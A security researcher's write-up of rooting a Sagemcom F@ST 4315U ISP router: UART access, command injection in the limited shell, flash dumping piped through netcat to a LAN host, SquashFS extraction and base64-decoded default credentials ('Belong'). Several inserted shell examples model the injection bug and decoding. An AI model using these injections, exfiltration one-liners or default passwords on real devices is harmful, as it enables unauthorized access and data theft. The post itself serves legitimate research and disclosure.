Dumping firmware on the F@ST 4315U

Published on June 27th, 2016
by Dylanger Daly

 

I’ve had one of these modem/routers lying around for a long time; it came with my ISP (Belong, here in Australia) and I was annoyed at the very limited access it gives you. Here’s a screenshot of the WebUI panel:

[Screenshot: the WebUI panel]

As you can see, the options in the sidebar are very limited, so, without further ado, let’s get UART on the device and have a look.

Note: This device ONLY has the web GUI port open; no SSH or Telnet access is provided.

Getting UART on the board

One of the first steps I took was getting UART on the device. As pictured below, the UART headers were already soldered onto the board.

[Photo: the UART header on the board]

After wiring up the UART port it should look something like this:

[Photo: the UART port wired up]

Playing around in the terminal

Logging in as ‘admin’ with the default password ‘Belong’ gets us into a limited shell:

[Screenshot: the limited shell after logging in as admin]

This is where things become interesting: we’re going to use command injection to have the router execute arbitrary commands.

The process is quite easy. One simply appends an ampersand and a second command to an allowed command, for example ping 8.8.8.8 & cat /etc/passwd. The limited shell doesn’t sanitize its input; it builds a command line from what you typed and hands it to /bin/sh, so the system shell treats the ampersand as its usual control operator: ping is started in the background and cat /etc/passwd is executed straight after it, like below:

 

[Screenshot: output of ping 8.8.8.8 & cat /etc/passwd]

As you can see, our command cat /etc/passwd was successfully executed and the console returned our users and their password hashes.
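To make the bug concrete, here is a toy model of the limited shell written for this post (it is not the device’s code, whose source is not public). It reproduces only the behaviour observed above: the first word is checked against an allow list and the whole line is then handed to /bin/sh. The hardened version splits the line itself, whitelists argument characters and runs the command directly, so nothing the user typed is ever re-parsed as shell syntax. The allow list and the use of echo in place of ping/cat are assumptions so the demo runs offline.

```shell
#!/bin/sh
# Added example: a model of the limited shell's command-injection bug and a
# hardened replacement. Not the F@ST 4315U's own code.

ALLOWED="ping ifconfig echo"     # assumed allow list; 'echo' keeps the demo offline

# Vulnerable: only the first word is checked, then the validated line is passed
# to sh -c, so '&', ';', '|' and $(...) are all interpreted by the system shell.
vuln_shell() {                   # vuln_shell '<line as typed by the user>'
    line=$1
    cmd=${line%% *}              # first word only
    case " $ALLOWED " in
        *" $cmd "*) sh -c "$line" ;;                      # <-- the bug
        *) echo "not allowed: $cmd" >&2; return 1 ;;
    esac
}

# Hardened: split the line into words ourselves, check every argument against a
# strict character allow list and exec the command with those words as argv.
# Returns 1 for a disallowed command, 2 for a rejected argument.
hardened_shell() {               # hardened_shell '<line as typed by the user>'
    line=$1
    set -f                       # no globbing while splitting on whitespace
    set -- $line
    set +f
    [ $# -gt 0 ] || return 1
    cmd=$1; shift
    case " $ALLOWED " in
        *" $cmd "*) ;;
        *) echo "not allowed: $cmd" >&2; return 1 ;;
    esac
    for arg in "$@"; do
        case $arg in
            *[!A-Za-z0-9._:-]*) echo "rejected argument: $arg" >&2; return 2 ;;
        esac
    done
    command "$cmd" "$@"          # no shell re-parsing of user text
}

# Demonstration with the shape of the injected line from the post, using echo
# in place of ping and cat so that it runs anywhere.
PAYLOAD='echo 8.8.8.8 & echo INJECTED'
vuln_shell "$PAYLOAD"            # prints 8.8.8.8 and INJECTED: the second command ran
hardened_shell "$PAYLOAD" || echo "hardened shell refused the line (status $?)"
```

The hardened version deliberately rejects the argument rather than stripping metacharacters: quoting the argument for sh is error-prone, and an allow list of safe characters is both simpler and safe regardless of which shell ends up interpreting the line.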

Dumping flash

Okay, so we have the hashes. Great, but I want to have a look at the SquashFS filesystem, and luckily this system has a limited version of netcat!

To start, listen on a PC within your LAN with nc -l -p 8000 > belongFlashDump.bin, then execute the following command on the router (192.168.20.106 is the listening PC):

[Screenshot: the flash dump command entered on the router]

This bad boy, ping & cat /dev/mtd0 | nc 192.168.20.106 8000, cats the contents of /dev/mtd0 (flash) and pipes them to netcat; the same trick can also be used to dump the memory of the router with ping & cat /dev/mem | nc 192.168.20.106 8000.

Extracting the SquashFS Filesystem

Okay, let’s have a look at the file we just dumped:

[Screenshot: inspecting the dumped flash image]

Using unsquashfs we were able to successfully extract the filesystem. Here’s the directory listing for the etc folder:

[Screenshot: directory listing of etc in the extracted filesystem]
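As an added example (not part of the original post), the PC-side half of the dump-and-extract step: receive what the router cats into netcat, hash it, and locate the SquashFS image inside the dump by its magic so unsquashfs can be pointed at the right offset. Two caveats a practitioner will want: on many Linux MTD devices /dev/mtd0 is only the first partition (often the bootloader) and /proc/mtd lists the rest, so a dump may hold more than one filesystem or none; and SquashFS magic appears as "hsqs" for little-endian images (SquashFS 4) but "sqsh" for the big-endian v3 images common on older MIPS builds, so search for both. GNU grep/coreutils on the PC are assumed; the test image is constructed, not a real dump.

```shell
#!/bin/sh
# Added example (not from the post): receive a "cat /dev/mtdN | nc <pc> 8000"
# dump, hash it, and carve SquashFS images out of it by magic.

# Listener side, as in the post. Start this BEFORE triggering the cat on the
# router. Note: OpenBSD-style netcat wants "nc -l 8000" and rejects -p with -l.
receive_dump() {                          # receive_dump <port> <outfile>
    nc -l -p "$1" > "$2"
    sha256sum "$2"                        # record it; a re-dump should match
}

# Print "<offset> <magic>" for every SquashFS superblock in the dump.
# "hsqs" = little-endian magic (SquashFS 4), "sqsh" = big-endian (older v3).
find_squashfs() {                         # find_squashfs <dump>
    for magic in hsqs sqsh; do
        LC_ALL=C grep -obUaF "$magic" "$1" | sed "s/:$magic\$/ $magic/"
    done | sort -n
}

# Carve from <offset> to end of file. unsquashfs ignores trailing data (padding
# or a following partition), so no end offset is needed.
carve_squashfs() {                        # carve_squashfs <dump> <offset> <out>
    tail -c +$(( $2 + 1 )) "$1" > "$3"
}

extract_squashfs() {                      # extract_squashfs <image> <destdir>
    unsquashfs -d "$2" "$1"
}

# Constructed test image (NOT a real dump): 4 KiB of padding, then the
# little-endian magic where a superblock would start, then 64 bytes of filler.
make_fake_dump() {                        # make_fake_dump <outfile>
    {
        dd if=/dev/zero bs=4096 count=1 2>/dev/null
        printf 'hsqs'
        head -c 64 /dev/zero
    } > "$1"
}

# Usage on a real dump: find_squashfs belongFlashDump.bin, then
# carve_squashfs belongFlashDump.bin <offset> fs.sqsh && extract_squashfs fs.sqsh squashfs-root
make_fake_dump /tmp/fake_dump.bin
find_squashfs /tmp/fake_dump.bin          # prints: 4096 hsqs
```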

One file stood out as interesting to me: default.cfg. This file contains all of the Belong/Telstra changes to the modem as well as… default passwords!

One part of that file in particular caught my eye:

<X_BROADCOM_COM_LoginCfg>
<AdminUserName>superuser</AdminUserName>
<AdminPassword>QmVsb25nAA==</AdminPassword>
<SupportUserName>support</SupportUserName>
<SupportPassword>QmVsb25nAA==</SupportPassword>
<UserUserName>admin</UserUserName>
<UserPassword>QmVsb25nAA==</UserPassword>
</X_BROADCOM_COM_LoginCfg>

This file stores the default passwords in base64. Simply echoing the password into base64 --decode gives us the following (note that QmVsb25nAA== decodes to seven bytes: the string Belong followed by a trailing NUL, presumably the C string terminator being stored along with the password):

[Screenshot: base64-decoding the stored password]

So, whats the superuser’s password?

Wait for it. The default password for superuser is… ‘Belong’. Crazy, right?
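Added here as an example (not the post’s own commands): a small script that pulls every account out of the X_BROADCOM_COM_LoginCfg block of a default.cfg and decodes it, while making the trailing NUL visible instead of letting it silently disappear in a terminal. The sample file is written from the fragment quoted above; the file name and the three fixed roles are assumptions.

```shell
#!/bin/sh
# Added example: decode the X_BROADCOM_COM_LoginCfg accounts from default.cfg.
# Not part of the original post.

# Decode one password field and drop the NUL so it can be used as a string.
decode_cfg_password() {                   # decode_cfg_password <base64>
    printf '%s' "$1" | base64 -d | tr -d '\000'
}

# Raw decoded length: QmVsb25nAA== is 7 bytes (Belong + 0x00), not 6.
decoded_length() {                        # decoded_length <base64>
    printf '%s' "$1" | base64 -d | wc -c | tr -d ' '
}

# Print "<role> <username> <password>" for the Admin, Support and User entries.
login_accounts() {                        # login_accounts <default.cfg>
    for role in Admin Support User; do
        user=$(sed -n "s:.*<${role}UserName>\([^<]*\)</${role}UserName>.*:\1:p" "$1")
        pw64=$(sed -n "s:.*<${role}Password>\([^<]*\)</${role}Password>.*:\1:p" "$1")
        [ -n "$user" ] || continue
        printf '%s %s %s\n' "$role" "$user" "$(decode_cfg_password "$pw64")"
    done
}

# Constructed sample: the fragment quoted in the post, written to a file.
write_sample_cfg() {                      # write_sample_cfg <file>
cat > "$1" <<'EOF'
<X_BROADCOM_COM_LoginCfg>
<AdminUserName>superuser</AdminUserName>
<AdminPassword>QmVsb25nAA==</AdminPassword>
<SupportUserName>support</SupportUserName>
<SupportPassword>QmVsb25nAA==</SupportPassword>
<UserUserName>admin</UserUserName>
<UserPassword>QmVsb25nAA==</UserPassword>
</X_BROADCOM_COM_LoginCfg>
EOF
}

write_sample_cfg /tmp/default.cfg
login_accounts /tmp/default.cfg           # Admin superuser Belong, etc.
printf '%s' QmVsb25nAA== | base64 -d | od -c   # shows the trailing \0 explicitly
```

On a real extracted filesystem point login_accounts at squashfs-root/etc/default.cfg; the od line is the quickest way to see why a decoded value that "looks right" in a terminal may still not match what the device compares byte for byte.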

Accessing the console as Superuser

You can log into the device as ‘superuser’ via the console over UART, and you get many more options:

Login: superuser
Password:
>
>
> ?
?
help
logout
exit
quit
reboot
adsl
xdslctl
xtm
brctl
cat
virtualserver
ddns
dm
df
loglevel
logdest
dumpcfg
dumpmdm
dumpeid
mdm
meminfo
kill
dumpsysinfo
exitOnIdle
dnsproxy
syslog
echo
ifconfig
ping
ps
pwd
sntp
sysinfo
tftp
wlctl
arp
defaultgateway
dhcpserver
dns
lan
lanhosts
passwd
ppp
restoredefault
route
save
swversion
uptime
cfgupdate
swupdate
wan
mcpctl

Awesome! Superuser access, time to log into that WebUI

Not quite: logging into the WebUI results in the connection being killed and this being written to the console:

[Screenshot: console output when superuser logs into the WebUI]

In the next post I will reverse engineer the httpd daemon to try and find out why we can’t log in with superuser. Looking at the number of config HTML files there are… this will be interesting:

╭─ddaly@bird-of-prey ~/BelongTake2/squashfs-root
╰─$ ls webs-EN
accesscntr.html hlppppoeconn.html quicksetuperr.html
adslcfgc.html hlppppoeip.html quicksetup.html
adslcfg.html hlptstdns.html quicksetuptesterr.html
algcfg.html hlpusbconn.html quicksetuptestsucc.html
atmdelerr.html hlpwlconn.html rebootinfo.html
backupsettings.html homeplug.html resetrouter.html
backuptextsettings.html homeplugpassword.html restoreinfo.html
Belong_PBT_logos.jpg ifcdns.html ResultSave.html
berrun.html ifcgateway.html routeadd.html
berstart.html index.html rtdefaultcfgerr.html
berstop.html info.html rtdefaultcfg.html
bmu.html ipoacfg.html scdmz.html
bn1.gif ippcfg.html scinflt.html
bn2.gif ipsconfig.html scmacflt.html
board.gif ipsec.html scmacpolicy.html
certadd.html ipv6lancfg.html scoutflt.html
certcaimport.html lancfg2.html scprttrg.html
certimport.html lang_setting.html scvrtsrv.html
certloadsigned.html lanvlancfg.html seclogintro.html
cfgatm.html ledallgreenoff.html seltcfgc.html
cfgepon.html ledallgreenon.html seltcfg.html
cfgeth.html l_gray.gif snmpconfig.html
cfggpon.html l_green.gif sntpcfg.html
cfgl2tpac.html lockerror.html speedsvc.html
cfgmoca.html logconfig.html standby.html
cfgptm.html login_error.html StaticIpAdd.html
cfgwlwan.html logintro.html StaticIpErr.html
charerror.html logobkg.gif statsadslerr.html
colors.css logoc.gif statsadsl.html
ddnsadd.html logo_corp.gif statsadslreset.html
defaultsettings.html logo.html statsatmerr.html
d_gray.gif logomenu.gif statsatm.html
d_green.gif logo_sagemcom_en_1.gif statsatmreset.html
dhcpinfo.html l_red.gif statsifc.html
diag8021ag.html l_yellow.gif statsifcreset.html
diagbr.html main.html statsmocalanreset.html
diagethoam.html menuBcm.js statsmocareset.html
diag.html menudown.html statsmocawanreset.html
diagipow.html menufake.html statsopticifc.html
diaglan.html menu.html statsopticifcreset.html
diagmer.html menuTitle.js statsvdslreset.html
diagpppoa.html menuTree.js statswanreset.html
diagpppoe.html mocacfg.html statsxtmreset.html
dlnacfg.html modeminfo.html storageusraccadd.html
dnscfg.html multicast.html stylemain.css
dnsproxycfg.html natcfg2.html todadd.html
d_red.gif netinfcfg.html tr69cfg.html
dsladderr.html netpercfg.html tunnel4in6.html
dslbondingcfg.html ntwksum2.html tunnel6in4.html
d_yellow.gif omcidownload.html twonkycfg.html
enblbridge.html omcisystem.html updatesettings.html
enblservice.html panel2.gif upload.html
engdebug.html panel.gif uploadinfo.html
eponadderr.html panel_transparent.gif upnpcfg.html
epondelerr.html password.html url_add.html
ethadderr.html *.png util.js
ethdelerr.html portmapadd.html wanadderr.html
footer.html portmapedit.html wancfg.html
gponadderr.html portName.js wifiwanadderr.html
gpondelerr.html pppoe.html wifiwandelerr.html
gponpword.html pradd.html wlcfgadv.html
gre.html ptmadderr.html wlcfg.html
hlpadslsync.html ptmdelerr.html wlcfgkey.html
hlpatmetoe.html pwrmngt.html wlmacflt.html
hlpatmseg.html qoscls.html wlrefresh.html
hlpethconn.html qospoliceradd.html wlsecurity.html
hlppngdns.html qosportshaping.html wlsetup.html
hlppnggw.html qosqmgmt.html wlwapias.html
hlppppoasess.html qosqueueadd.html xdslcfg.html
hlppppoeauth.html qsmain.html

Can I snag a copy of a zipped filesystem?

Sure! Let me first just make sure I can as there may be some legal issues with doing so.

Dylanger Daly

If it’s security, I’m there. I mainly work in the security research field; most of my focus is mobile security, anything from the hardware to TrustZone to the modem. Bypassing checks one NOP at a time.

